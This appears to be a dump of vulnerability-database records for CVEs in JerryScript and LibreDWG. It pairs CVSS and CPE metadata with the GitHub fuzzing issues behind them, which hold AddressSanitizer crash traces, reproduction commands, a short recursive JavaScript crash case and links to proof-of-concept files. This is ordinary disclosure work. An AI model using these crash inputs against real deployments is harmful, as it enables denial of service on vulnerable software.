ecma_builtin_typedarray_prototype_sort_compare_helper /home/jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1103 #15 0x5676ecf0 in ecma_builtin_helper_array_merge_sort_bottom_up /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:48 #16 0x5676ef2a in ecma_builtin_helper_array_merge_sort_helper /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:111 #17 0x56697594 in ecma_builtin_typedarray_prototype_sort /home/jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1180 #18 0x5669b416 in ecma_builtin_typedarray_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1872 #19 0x5669154d in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1454 #20 0x566917e2 in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1486 #21 0x566b6394 in ecma_op_function_call_native /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1194 #22 0x566b6d63 in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1374 #23 0x5673673a in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:799 #24 0x567555c3 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:5237 #25 0x56755bf1 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5338 #26 0x567348f1 in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:305 #27 0x56641ca6 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:592 #28 0x5663a132 in main /home/jerryscript/jerry-main/main-jerry.c:173 #29 0xf75c5ee4 in __libc_start_main (/lib32/libc.so.6+0x1eee4) previously allocated by thread T0 here: #0 0xf79c8c17 in __interceptor_malloc (/lib32/libasan.so.5+0x113c17) #1 0x566ec041 in jmem_heap_alloc /home/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x566ec0b1 in jmem_heap_gc_and_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:291 #3 0x566ec13e in jmem_heap_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:324 #4 0x56755de3 in ecma_alloc_string_buffer /home/jerryscript/jerry-core/ecma/base/ecma-alloc.c:222 #5 0x566661cc in ecma_new_ecma_string_from_utf8_buffer /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:264 #6 0x566661cc in ecma_new_ecma_string_from_utf8 /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:385 #7 0x56645ec0 in jerry_create_string_sz /home/jerryscript/jerry-core/api/jerry.c:2688 #8 0x56645e61 in jerry_create_string /home/jerryscript/jerry-core/api/jerry.c:2671 #9 0x567db0a9 in jerryx_handler_register_global /home/jerryscript/jerry-ext/handler/handler-register.c:32 #10 0x5663b483 in main_register_global_function /home/jerryscript/jerry-main/main-utils.c:42 #11 0x5663c0d9 in main_init_engine /home/jerryscript/jerry-main/main-utils.c:291 #12 0x566396c4 in main /home/jerryscript/jerry-main/main-jerry.c:72 #13 0xf75c5ee4 in __libc_start_main (/lib32/libc.so.6+0x1eee4) SUMMARY: AddressSanitizer: heap-use-after-free /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:1940 in ecma_compare_ecma_non_direct_strings Shadow bytes around the buggy address: 0x3ea000e0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa 0x3ea000f0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 0x3ea00100: 00 00 fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 0x3ea00110: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 00 0x3ea00120: fa fa fd fd fd fa fa fa fd fd fd fa fa fa 00 00 =>0x3ea00130: 00 fa fa fa 00 00 00 00 fa fa[fd]fd fd fa fa fa 0x3ea00140: 00 00 00 00 fa fa fd fd fd fa fa fa 00 00 00 fa 0x3ea00150: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 0x3ea00160: 00 fa fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 0x3ea00170: 00 00 00 00 fa fa 00 00 00 fa fa fa 00 00 00 fa 0x3ea00180: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==31426==ABORTING ```
heap-use-after-free in ecma_compare_ecma_non_direct_strings
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4747/comments
0
2021-08-24T03:35:55Z
2021-11-02T07:40:08Z
https://github.com/jerryscript-project/jerryscript/issues/4747
977,668,295
4,747
CVE-2021-41683
2022-06-20T14:15:08.997
There is a stack-overflow at ecma-helpers.c:326 in ecma_get_lex_env_type in JerryScript 2.4.0
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4745" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/4745
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision ``` 3bcd48f7 ``` ###### Build platform ``` Ubuntu 20.04.2 LTS (Linux 5.11.0-25-generic x86_64) ``` ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --stack-limit=20 ``` ###### Test case ``` function Foo() { new Foo() } var o = new Foo(); ``` ###### Output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==26122==ERROR: AddressSanitizer: stack-overflow on address 0xff793ffc (pc 0x5663300c bp 0xff794018 sp 0xff794000 T0) #0 0x5663300b in ecma_get_lex_env_type /home/jerryscript/jerry-core/ecma/base/ecma-helpers.c:326 #1 0x567531ae in ecma_op_resolve_reference_value /home/jerryscript/jerry-core/ecma/operations/ecma-reference.c:293 #2 0x566f4821 in vm_loop /home/jerryscript/jerry-core/vm/vm.c:1098 #3 0x5671255e in vm_execute /home/jerryscript/jerry-core/vm/vm.c:5231 #4 0x56712bf1 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5338 #5 0x56673029 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1130 ... #241 0x566742ee in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1572 #242 0x566f3c87 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:884 #243 0x56712601 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:5258 #244 0x56712bf1 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5338 #245 0x56673029 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1130 #246 0x566742ee in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1572 SUMMARY: AddressSanitizer: stack-overflow /home/jerryscript/jerry-core/ecma/base/ecma-helpers.c:326 in ecma_get_lex_env_type ==26122==ABORTING ```
stack-overflow in ecma_get_lex_env_type
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4745/comments
0
2021-08-24T03:27:50Z
2021-10-20T14:03:14Z
https://github.com/jerryscript-project/jerryscript/issues/4745
977,665,470
4,745
CVE-2022-33024
2022-06-23T17:15:13.993
There is an Assertion `int decode_preR13_entities(BITCODE_RL, BITCODE_RL, unsigned int, BITCODE_RL, BITCODE_RL, Bit_Chain *, Dwg_Data *' failed at dwg2dxf: decode.c:5801 in libredwg v0.12.4.4608.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/492" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.4.4608:*:*:*:*:*:*:*", "matchCriteriaId": "205AD0A5-0F64-4F38-A208-B41F8C1E8952", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/492
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
### system info Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608)) ### Command line ./programs/dwg2dxf -b -m @@ -o /dev/null ### output dwg2dxf: decode.c:5801: int decode_preR13_entities(BITCODE_RL, BITCODE_RL, unsigned int, BITCODE_RL, BITCODE_RL, Bit_Chain *, Dwg_Data *): Assertion `!dat->bit' failed. Aborted ### poc https://gitee.com/cxlzff/fuzz-poc/raw/master/libredwg/decode_preR13_entities_Assertion
Assertion dwg2dxf: decode.c:5801: int decode_preR13_entities(BITCODE_RL, BITCODE_RL, unsigned int, BITCODE_RL, BITCODE_RL, Bit_Chain *, Dwg_Data *): Assertion `!dat->bit' failed. Aborted.
https://api.github.com/repos/LibreDWG/libredwg/issues/492/comments
4
2022-06-07T01:43:47Z
2022-12-15T08:04:07Z
https://github.com/LibreDWG/libredwg/issues/492
1,262,615,938
492
CVE-2022-33025
2022-06-23T17:15:14.033
LibreDWG v0.12.4.4608 was discovered to contain a heap-use-after-free via the function decode_preR13_section at decode_r11.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/487" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:-:*:*:*:*:*:*:*", "matchCriteriaId": "6FE47054-8B69-4569-934E-EE67FC88DD36", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/487
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
### system info Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608)) ### Command line ./programs/dwg2dxf -b -m @@ -o /dev/null ### AddressSanitizer output ==8989==ERROR: AddressSanitizer: heap-use-after-free on address 0x7ffff7e35838 at pc 0x0000007106ca bp 0x7fffffffc8b0 sp 0x7fffffffc8a8 READ of size 8 at 0x7ffff7e35838 thread T0 #0 0x7106c9 in decode_preR13_section /testcase/libredwg/src/decode_r11.c:339:35 #1 0x705d0a in decode_preR13 /testcase/libredwg/src/decode_r11.c:830:12 #2 0x53245a in dwg_decode /testcase/libredwg/src/decode.c:209:23 #3 0x50d759 in dwg_read_file /testcase/libredwg/src/dwg.c:254:11 #4 0x50c454 in main /testcase/libredwg/programs/dwg2dxf.c:258:15 #5 0x7ffff6e22c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x419ee9 in _start (/testcase/libredwg/programs/dwg2dxf+0x419ee9) 0x7ffff7e35838 is located 56 bytes inside of 172032-byte region [0x7ffff7e35800,0x7ffff7e5f800) freed by thread T0 here: #0 0x4d2968 in realloc /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:79 #1 0x5a05b5 in dwg_add_object /testcase/libredwg/src/decode.c:4730:35 previously allocated by thread T0 here: #0 0x4d2750 in calloc /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74 #1 0x5a0465 in dwg_add_object /testcase/libredwg/src/decode.c:4719:35 SUMMARY: AddressSanitizer: heap-use-after-free /testcase/libredwg/src/decode_r11.c:339:35 in decode_preR13_section Shadow bytes around the buggy address: 0x10007efbeab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x10007efbeac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x10007efbead0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x10007efbeae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x10007efbeaf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x10007efbeb00: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd 0x10007efbeb10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x10007efbeb20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x10007efbeb30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x10007efbeb40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x10007efbeb50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==8989==ABORTING ### poc https://gitee.com/cxlzff/fuzz-poc/raw/master/libredwg/decode_preR13_uaf
heap-use-after-free exists in the function decode_preR13_section in decode_r11.c
https://api.github.com/repos/LibreDWG/libredwg/issues/487/comments
3
2022-06-07T01:31:30Z
2022-12-15T08:44:07Z
https://github.com/LibreDWG/libredwg/issues/487
1,262,609,657
487
CVE-2022-33026
2022-06-23T17:15:14.073
LibreDWG v0.12.4.4608 was discovered to contain a heap buffer overflow via the function bit_calc_CRC at bits.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/484" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:-:*:*:*:*:*:*:*", "matchCriteriaId": "6FE47054-8B69-4569-934E-EE67FC88DD36", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/484
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
### system info Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608)) ### Command line ./programs/dwg2dxf -b -m @@ -o /dev/null ### AddressSanitizer output ==8982==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x616000000592 at pc 0x0000005289e1 bp 0x7fffffffca80 sp 0x7fffffffca78 READ of size 1 at 0x616000000592 thread T0 #0 0x5289e0 in bit_calc_CRC /testcase/libredwg/src/bits.c:3257:29 #1 0x7059b1 in decode_preR13 /testcase/libredwg/src/decode_r11.c:760:14 #2 0x53245a in dwg_decode /testcase/libredwg/src/decode.c:209:23 #3 0x50d759 in dwg_read_file /testcase/libredwg/src/dwg.c:254:11 #4 0x50c454 in main /testcase/libredwg/programs/dwg2dxf.c:258:15 #5 0x7ffff6e22c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x419ee9 in _start (/testcase/libredwg/programs/dwg2dxf+0x419ee9) 0x616000000592 is located 0 bytes to the right of 530-byte region [0x616000000380,0x616000000592) allocated by thread T0 here: #0 0x4d2750 in calloc /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74 #1 0x50cdd0 in dat_read_file /testcase/libredwg/src/dwg.c:91:33 #2 0x50d708 in dwg_read_file /testcase/libredwg/src/dwg.c:247:15 #3 0x50c454 in main /testcase/libredwg/programs/dwg2dxf.c:258:15 #4 0x7ffff6e22c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /testcase/libredwg/src/bits.c:3257:29 in bit_calc_CRC Shadow bytes around the buggy address: 0x0c2c7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff80a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2c7fff80b0: 00 00[02]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff8100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==8982==ABORTING ### poc https://gitee.com/cxlzff/fuzz-poc/raw/master/libredwg/bit_calc_CRC_bof
heap-buffer-overflow exists in the function bit_calc_CRC in bits.c
https://api.github.com/repos/LibreDWG/libredwg/issues/484/comments
3
2022-06-07T01:21:33Z
2022-12-15T08:15:29Z
https://github.com/LibreDWG/libredwg/issues/484
1,262,604,647
484
CVE-2022-33027
2022-06-23T17:15:14.113
LibreDWG v0.12.4.4608 was discovered to contain a heap-use-after-free via the function dwg_add_handleref at dwg.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/490" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:-:*:*:*:*:*:*:*", "matchCriteriaId": "6FE47054-8B69-4569-934E-EE67FC88DD36", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/490
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
### system info Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608)) ### Command line ./programs/dwg2dxf -b -m @@ -o /dev/null ### AddressSanitizer output ==8997==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000000730 at pc 0x000000517369 bp 0x7fffffffc7d0 sp 0x7fffffffc7c8 READ of size 8 at 0x604000000730 thread T0 #0 0x517368 in dwg_add_handleref /testcase/libredwg/src/dwg.c:2014:21 #1 0x7ea615 in dwg_add_BLOCK_HEADER /testcase/libredwg/src/dwg_api.c:24588:3 #2 0x70baf6 in decode_preR13_section /testcase/libredwg/src/decode_r11.c:325:20 #3 0x705d0a in decode_preR13 /testcase/libredwg/src/decode_r11.c:830:12 #4 0x53245a in dwg_decode /testcase/libredwg/src/decode.c:209:23 #5 0x50d759 in dwg_read_file /testcase/libredwg/src/dwg.c:254:11 #6 0x50c454 in main /testcase/libredwg/programs/dwg2dxf.c:258:15 #7 0x7ffff6e22c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #8 0x419ee9 in _start (/testcase/libredwg/programs/dwg2dxf+0x419ee9) 0x604000000730 is located 32 bytes inside of 48-byte region [0x604000000710,0x604000000740) freed by thread T0 here: #0 0x4d23a0 in __interceptor_cfree.localalias.0 /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:55 #1 0x7070a2 in decode_preR13_header_variables /testcase/libredwg/src/./header_variables_r11.spec:65:3 #2 0x232900001100144d (<unknown module>) previously allocated by thread T0 here: #0 0x4d2750 in calloc /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74 #1 0x54900c in dwg_new_ref /testcase/libredwg/src/decode.c:4027:43 SUMMARY: AddressSanitizer: heap-use-after-free /testcase/libredwg/src/dwg.c:2014:21 in dwg_add_handleref Shadow bytes around the buggy address: 0x0c087fff8090: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa 0x0c087fff80a0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff80b0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff80c0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff80d0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 =>0x0c087fff80e0: fa fa fd fd fd fd[fd]fd fa fa 00 00 00 00 00 00 0x0c087fff80f0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fd 0x0c087fff8100: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8110: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8120: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8130: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==8997==ABORTING ### poc https://gitee.com/cxlzff/fuzz-poc/raw/master/libredwg/dwg_add_handleref_uaf
heap-use-after-free exists in the function dwg_add_handleref in dwg.c
https://api.github.com/repos/LibreDWG/libredwg/issues/490/comments
3
2022-06-07T01:40:09Z
2022-12-15T08:40:34Z
https://github.com/LibreDWG/libredwg/issues/490
1,262,614,234
490
CVE-2022-33028
2022-06-23T17:15:14.150
LibreDWG v0.12.4.4608 was discovered to contain a heap buffer overflow via the function dwg_add_object at decode.c.
